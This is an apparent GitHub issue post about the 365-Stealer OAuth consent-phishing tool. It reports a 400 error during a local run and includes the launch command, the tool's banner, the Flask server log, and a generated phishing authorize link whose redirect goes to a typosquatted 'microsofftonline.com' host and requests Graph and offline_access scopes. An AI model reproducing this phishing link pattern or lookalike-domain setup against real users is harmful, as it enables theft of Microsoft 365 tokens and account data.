Error 400

[frenyman]

Hi,
When the app is run and the phishing is sent locally, a 400 error appears and consent is accepted. The malicious app has the URI "https://login.microsofftonline.com:4443/login/authorized" and the DNS points to login.microsofftonline.com on localhost.

C:\xampp\htdocs\365-Stealer-master>python 365-Stealer.py --run-app --port 4443

      .oooo.       .ooo     oooooooo
    .dP""Y88b    .88'      dP"""""""
          ]8P'  d88'      d88888b.
        <88b.  d888P"Ybo.     `Y88b
         `88b. Y88[   ]88       ]88  8888888
    o.   .88P  `Y88   88P o.   .88P
    `8bd88P'    `88bod8'  `8bd88P'

     .oooooo..o     .                       oooo
    d8P'    `Y8   .o8                       `888
    Y88bo.      .o888oo  .ooooo.   .oooo.    888   .ooooo.  oooo d8b
     `"Y8888o.    888   d88' `88b `P  )88b   888  d88' `88b `888""8P
         `"Y88b   888   888ooo888  .oP"888   888  888ooo888  888
    oo     .d8P   888 . 888    .o d8(  888   888  888    .o  888
    8""88888P'    "888" `Y8bod8P' `Y888""8o o888o `Y8bod8P' d888b
________________________________________________________________________
 Credit: o365-Attack-Toolkit                 Author: @trouble1_raunak

 Github: https://github.com/alteredsecurity/365-Stealer


[!] Stealing processes delayed with 1 seconds.
Phishing Link => https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=xxxxxxx-xx-xxx-xxxx-398ed37e09e1&scope=https%3A%2F%2Fgraph.microsoft.com%2F.default+openid+offline_access+&redirect_uri=https%3A%2F%2Flogin.microsofftonline.com%3A4443%2Flogin%2Fauthorized&response_mode=query

Home page running on port: 4443

 * Serving Flask app '365-Stealer'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:4443
 * Running on https://192.168.56.73:4443
Press CTRL+C to quit
Error: 400 Bad Request: The browser (or proxy) sent a request that this server could not understand.
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /login/authorized HTTP/1.1" 302 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/bootstrap/css/bootstrap.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/aos/aos.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/css/style.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery/jquery.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/venobox/venobox.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/icofont/icofont.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/animate.css/animate.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/owl.carousel/assets/owl.carousel.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/boxicons/css/boxicons.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery.easing/jquery.easing.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/php-email-form/validate.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery-sticky/jquery.sticky.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/venobox/venobox.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/waypoints/jquery.waypoints.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/counterup/counterup.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/owl.carousel/owl.carousel.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/isotope-layout/isotope.pkgd.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/aos/aos.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/js/main.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/img/about.jpg HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/img/slide/slide-1.jpg HTTP/1.1" 304 -